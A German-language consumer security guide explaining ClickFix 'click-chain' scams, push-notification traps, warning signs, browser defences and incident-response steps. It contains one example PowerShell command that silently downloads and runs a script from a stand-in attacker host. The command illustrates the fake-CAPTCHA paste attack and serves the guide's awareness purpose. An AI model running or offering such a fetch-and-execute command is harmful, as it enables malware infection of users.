Klick-Chain-Scams

Das Prinzip: das Opfer führt selbst aus

Klassisches Phishing braucht entweder einen geklickten Link (Anmelde-Daten-Diebstahl) oder einen Doppelklick auf eine heruntergeladene Datei (Malware-Infektion). Beides hat in den letzten Jahren technischen Schutz bekommen: URL-Filter, SmartScreen, MOTW, Gatekeeper.

Klick-Chain-Scams sind die Reaktion darauf. Statt einen Download zu erzwingen, leitet die Seite den Nutzer an, Befehle selbst zu kopieren und auszuführen — über Tastatur-Shortcuts wie Win+R (Ausführen-Dialog auf Windows), Win+X (Terminal), Strg+Cmd+T (Terminal auf macOS), oder über die Aufforderung, eine eingebettete URL manuell zu öffnen.

Drei Designentscheidungen machen das schwer abwehrbar:

• Kein Datei-Download. MOTW, SmartScreen, Gatekeeper greifen nicht — es gibt keine Datei zum Markieren.
• Vorhandene OS-Werkzeuge. Der Angreifer nutzt PowerShell, mshta, conhost — alle vom Betriebssystem signiert, alle vertrauenswürdig.
• Sozialer Mantel. Die Anweisungen kommen in Form, die Nutzer:innen kennen — CAPTCHA, Verifikation, „Reparatur-Hinweis".

Microsoft Threat Intelligence prägte 2024 den Begriff ClickFix für diese Familie; andere Vendoren reden über „Drive-by Paste Attacks" oder „Self-Pasting Malware". Die Technik hat sich 2024 stark verbreitet und gehört seit dem Microsoft-Threat-Report 2024 zu den Wachstums-Klassen.

Eine typische ClickFix-Kette

Damit das konkret wird, ein realistisches Beispiel:

1. Lockmittel. Du landest auf einer Webseite — über Werbung, einen Mail-Link, ein Tippfehler-Domain. Manchmal auch über manipulierte Suchergebnisse (SEO-Poisoning bei beliebten Suchbegriffen wie „free Adobe Reader").
2. Fake-Verifikation. Die Seite zeigt einen Cloudflare-Look-alike-Bildschirm: „Verifying you are human… please complete this step." Mit Cloudflare-Logo, mit professionellem Layout.
3. Anweisung. „Please perform these steps to verify:"
   • Step 1: Drücke Win + R (öffnet den Ausführen-Dialog).
   • Step 2: Drücke Strg + V (fügt etwas aus der Zwischenablage ein).
   • Step 3: Drücke Enter.
4. Was im Hintergrund passierte: JavaScript der Seite hat — sobald du auf einen Button geklickt hast — einen PowerShell- oder cmd-Befehl in deine Zwischenablage geschrieben. Etwas wie:

powershell -w hidden -c "iwr https://attacker.example/payload.ps1 -OutFile $env:TEMP\u.ps1; & $env:TEMP\u.ps1"

5. Wenn du die drei Tastenkombinationen ausführst: Das Run-Dialog öffnet sich (nicht verdächtig), du fügst aus der Zwischenablage ein (nicht verdächtig — du erwartest, dass dort dein letztes Kopieren ist), Enter (nicht verdächtig).
6. Im Hintergrund: PowerShell lädt eine Schadsoftware-Datei von einem Angreifer-Server, führt sie aus, etabliert Persistenz, beginnt mit Daten-Diebstahl oder Lateral Movement.

Die ganze Kette: drei Tastendrücke, kein Doppelklick auf eine heruntergeladene Datei, keine SmartScreen-Warnung. Das ist der ganze Trick.

Die Varianten der Klick-Chain

Klick-Chain-Scams kommen in mehreren Verkleidungen:

Eine besonders perfide Variante in 2024/25: Fake-Verifikation auf Pirate-Streaming-Sites. Die Zielgruppe — Nutzer:innen, die gerade illegal gestreamten Content suchen — ist weniger geneigt, „komische Hinweise" mit IT-Support zu klären. Reibungsverlust ist niedrig.

Die Browser-Push-Falle

Eine verwandte, oft vor- oder nachgeschaltete Masche: Browser-Benachrichtigungs-Spam. Beim Besuch einer Seite erscheint:

„example.com möchte Benachrichtigungen senden — Erlauben | Blockieren"

Wer auf „Erlauben" klickt, bekommt fortan vom Browser (nicht von der Seite) immer wieder Push-Benachrichtigungen — auch wenn die Seite längst geschlossen ist. Diese Benachrichtigungen sehen aus wie System-Hinweise: „Ihr Computer ist infiziert", „Klicken Sie hier zur Reparatur", „Adobe-Update verfügbar".

Klick auf eine solche Benachrichtigung führt entweder direkt auf eine ClickFix-Seite (siehe oben) oder auf einen Tech-Support-Scam (Telefonnummer einer angeblichen Microsoft-Hotline, die dann TeamViewer-Installation verlangt).

Die Falle: das Opfer hat die Benachrichtigungen selbst aktiviert — irgendwann auf einer fragwürdigen Seite. Die Sicherheits-Architektur (Benachrichtigungs-Permission-Prompt) hat funktioniert; was versagt hat, ist die menschliche Bewertung.

Aufräumen:

• Chrome: Einstellungen → Datenschutz und Sicherheit → Website-Einstellungen → Benachrichtigungen. Alle nicht erwarteten Erlaubnisse zurückziehen.
• Firefox: Einstellungen → Datenschutz & Sicherheit → Berechtigungen → Benachrichtigungen.
• Safari: Einstellungen → Websites → Benachrichtigungen.
• Edge: Einstellungen → Cookies und Website-Berechtigungen → Benachrichtigungen.

Default für künftige Anfragen: „Blockieren" statt „Nachfragen". So wirst du nicht mehr gefragt — gleichwertig zu „keiner Seite Push erlauben".

Die universellen Reflexe

Drei einfache Regeln, die fast alle Klick-Chain-Scams stoppen:

Regel 1: Eine Webseite gibt dir niemals Anweisungen, Tastenkombinationen auf deinem Betriebssystem zu drücken.

Wenn eine Seite dich auffordert, Win+R, Win+X, Strg+Cmd+T, Cmd+Space, ein Terminal zu öffnen oder eine cmd.exe zu starten — das ist Phishing. Echte CAPTCHAs, echte Verifikations-Bildschirme, echte Browser-Updates verlangen das niemals. Nicht „selten" — nie.

Regel 2: Eine Webseite gibt dir niemals Anweisungen, etwas in dein Run-Dialog oder Terminal einzufügen.

Wenn du im Browser bist und plötzlich eine Anweisung der Form „fügen Sie Folgendes in Ihr Terminal ein" siehst — Aufmerksamkeit. Bei sehr seltenen legitimen Ausnahmen (z. B. Hersteller-Installationsanleitungen für Entwickler-Tools) ist die Quelle die offizielle Hersteller-Domain mit klarem Kontext. Nie in dem Moment, in dem du gerade ein „CAPTCHA" siehst.

Regel 3: Browser-Updates und System-Warnungen kommen niemals über Web-Banner.

Echtes Browser-Update: über das interne Update-Menü (Über Chrome / Firefox / Edge). Echte Windows-Sicherheits-Warnung: vom System-Tray oder Windows Security Center, nicht aus einer Webseite. Echte macOS-Hinweise: über das System-Einstellungen-Panel oder das Apple-Logo-Menü. Ein Browser-Tab kann keine System-Warnung zeigen, die echt ist.

Diese drei Regeln decken über 95 % aller Klick-Chain-Scams ab. Wer sie verinnerlicht hat, fällt nicht herein — auch nicht in Müdigkeit oder unter Zeitdruck.

Was Browser und OS dagegen tun

Eine Reihe von Schutz-Mechanismen entwickeln sich:

• Chrome blockiert seit 2024 reflexhaft den clipboard-write-Zugriff auf nicht-aktive Tabs und auf manche Domain-Klassen. Klick-Chain-Scams setzen darauf, die Zwischenablage gerade dann zu beschreiben, wenn du auf der Seite bist — und das funktioniert oft, weil du den Klick gemacht hast.
• Edge SmartScreen hat 2024 spezifische ClickFix-Erkennung dazubekommen — bekannte Lockbilder werden geflaggt.
• Browser-Push-Benachrichtigungen sind in Chrome 117+ schwerer zu erlauben — Default-Banner sind dezenter, häufige Anfragen werden gedämpft.
• Microsoft Defender hat seit 2024 eine PowerShell-Skript-Inspection, die fremde Download-Aufrufe (iwr, wget) aus cmd.exe/Run-Dialog-Ausführungen heuristisch erkennt.

Trotzdem: die Architektur des Web-Stacks erlaubt grundsätzlich, dass eine Seite anweisende Texte zeigt — das ist normales HTML. Was dem Browser fehlt, ist eine semantische Bewertung der Anweisungen. Hier hilft nur die menschliche Erkennung.

Wenn es zu spät ist

Wenn du eine Klick-Chain-Anweisung tatsächlich ausgeführt hast — bevor du es bemerkst, war Code-Ausführung schon —, folgt das Standard-Incident-Response-Schema:

Sofort:

• Gerät vom Netz nehmen. WLAN aus, Ethernet ziehen. Schadcode kann nicht mehr nachladen oder Daten exfiltrieren.
• Browser-Tab schließen — und ggf. weitere offene Browser-Sessions abmelden (von einem anderen, sauberen Gerät aus).
• Geöffnete Prozesse nicht reflexhaft beenden — manche Schadsoftware löscht sich selbst.

Innerhalb der ersten Stunde:

• Vollscan mit Microsoft Defender / XProtect plus einer zweiten Meinung (Malwarebytes Free, ESET Online Scanner).
• Verdächtige Prozesse im Task-Manager / Activity Monitor suchen — vor allem PowerShell-Prozesse mit ungewöhnlichen Argumenten, mshta, wscript, cscript.
• Persistenz-Punkte prüfen — Autostart, geplante Tasks, neue Dienste. (Auf Windows: Task-Manager → Autostart. Tiefer: Sysinternals Autoruns.)

Innerhalb des Tages:

• Passwörter ändern für alle Konten, die im Browser gespeichert waren oder kürzlich eingegeben wurden — von einem sauberen Gerät.
• Aktive Sessions abmelden überall (siehe session-und-geraete-verwaltung).
• Bei ernster Kompromittierung: System neu aufsetzen. Bei sehr informationssensiblen Geräten ist das die einzige Variante mit echtem Sicherheits-Niveau.
• Anzeige bei der Polizei, vor allem bei finanziellem Schaden.

Die ersten zwei Schritte (vom Netz nehmen, vom anderen Gerät handeln) sind die wichtigsten — sie kappen die laufende Kommunikation des Angreifers.

Weiterführende Ressourcen

Externe Quellen

• Microsoft Threat Intelligence – ClickFix Trends (2024) (Suche: ClickFix)
• Proofpoint – ClickFix Research (Suche: ClickFix)
• Mandiant – Advanced Persistent Threats & Initial Access
• CISA – Threat Activity Updates
• Sysinternals Autoruns – Persistenz-Inspektion
• BSI – Schadprogramme und Schutz
• Bleeping Computer – ClickFix-Kampagnen (Suche: ClickFix)
• Malwarebytes – Free Scanner

Verwandte Artikel

• Download-Hygiene
• Browser sicher einrichten
• Phishing erkennen
• Romance- und Investment-Scams
• Phishing melden und nach Klick reagieren
• Session- und Geräte-Verwaltung